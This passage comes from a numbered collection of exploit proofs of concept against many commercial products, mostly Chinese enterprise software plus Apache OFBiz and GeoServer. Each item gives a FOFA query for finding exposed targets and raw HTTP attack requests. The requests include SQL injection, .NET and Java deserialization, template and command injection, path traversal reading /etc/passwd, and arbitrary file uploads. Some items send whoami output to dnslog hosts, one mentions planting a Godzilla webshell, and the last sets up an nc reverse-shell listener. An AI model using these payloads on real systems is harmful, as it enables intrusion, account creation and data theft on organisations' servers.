/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
    "storeID":{
        "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
        "MethodName":"Start",
        "ObjectInstance":{
            "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "StartInfo": {
                "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
            }
        }
    }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload.jsp arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云 一脸通智慧管理平台 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 has been created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 (Wanhu) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The string 6cfe798ba8e5b85feb50164c59f4bec9 appearing on lines 42 and 43 of the response confirms the vulnerability.

67. 万户 (Wanhu) ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 (Wanhu) ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 (Wanhu) ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 (Wanhu) ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 (Newcapec) 掌上校园 service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 clothing management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The EXP request is as follows; it plants a Godzilla webshell
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 (DBAppSecurity MingYu security gateway) aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq4
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御安全网关 (DBAppSecurity MingYu security gateway) aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神 (Qi An Xin) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信网神 (Qi An Xin) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
